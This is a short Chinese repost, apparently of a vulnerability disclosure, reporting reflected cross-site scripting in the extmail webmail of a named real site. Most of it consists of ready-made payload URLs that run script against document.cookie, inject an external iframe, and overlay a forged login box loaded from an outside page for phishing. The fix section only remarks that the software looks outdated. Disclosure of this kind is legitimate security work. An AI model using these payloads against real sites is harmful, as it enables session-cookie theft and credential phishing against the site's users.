来源:自学PHP网 时间:2015-04-17 11:59 作者: 阅读:次
[导读] 1.跨站2.伪造登陆框邮箱系统:https://mail.19lou.com/extmail/cgi/index.cgiextmail几处反射性跨站,https://mail.19lou.com/extmail/cgi/index.cgi?__mode=%3Cscript%3Ealert%28document.cookie%29%3C/script%......
|
1.跨站
2.伪造登陆框
邮箱系统:
https://mail.19lou.com/extmail/cgi/index.cgi
extmail几处反射性跨站,
https://mail.19lou.com/extmail/cgi/index.cgi?__mode=%3Cscript%3Ealert%28document.cookie%29%3C/script%3E&error=badlogi
https://mail.19lou.com//extman/cgi/signup.cgi?domain=%3Cscript%3Ealert%28document.cookie%29%3C/script%3
....
加载ifream
https://mail.19lou.com//extman/cgi/signup.cgi?domain=%3Ciframe%20src=%22http://wooyun.org%22%20width=%22500%22%20height=%22180%22%3E&error=badlogi
(图略)
伪造登陆框
https://mail.19lou.com/extmail/cgi/index.cgi?__mode=%22%3E%3Ciframe%20src=%22http://127.0.0.1/false.htm%22%20width=%22800%22%20height=%22980%22%20frameborder=0%20%3E%20&error=badlogi
伪造效果还行:
 加载的外部false.htm
 false.htm内容
 修复方案:
貌似版本有点旧了
|
自学PHP网专注网站建设学习,PHP程序学习,平面设计学习,以及操作系统学习
京ICP备14009008号-1@版权所有www.zixuephp.com
网站声明:本站所有视频,教程都由网友上传,站长收集和分享给大家学习使用,如由牵扯版权问题请联系站长邮箱904561283@qq.com
